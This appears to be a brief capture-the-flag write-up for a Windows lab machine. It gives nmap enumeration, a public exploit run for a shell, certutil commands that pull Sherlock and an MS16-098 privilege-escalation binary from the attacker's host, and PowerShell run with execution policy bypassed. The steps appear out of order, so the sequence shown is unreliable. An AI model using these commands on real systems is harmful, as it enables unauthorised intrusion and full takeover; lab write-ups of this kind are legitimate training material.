we can find it in /usr/share/windows-resources/binaries/nc.exe and paste it into our Downloads/optimum folder
python3 -m http.server 80 and host our current directory for the nc.exe file
Then we upload sherlock(https://github.com/rasta-mouse/Sherlock) using certutil -urlcache -f http://10.10.14.25/sherlock.ps1 sherlock.ps1
We can also use wesng(https://github.com/bitsadmin/wesng)
Last updated
We use nmap -p- -A -Pn 10.10.10.8 to enumerate:
We found a website:
We used the exploit https://www.exploit-db.com/exploits/39161 we need nc.exe
We modify the ip in the exploit file
We keep running the exploit with python 39161.py 10.10.10.8 80 to get the shell:
Then use it to look for vulnerabilites using: powershell.exe -exec bypass -Command "& {Import-Module .\sherlock.ps1; Find-AllVulns}" :
We use https://github.com/sensepost/ms16-098/blob/master/bfill.exe to get privilege escalation by uploading the file first certutil -urlcache -f http://10.10.14.25/bfill.exe bfill.exe and then executing it bfill.exe: We get a root shell.
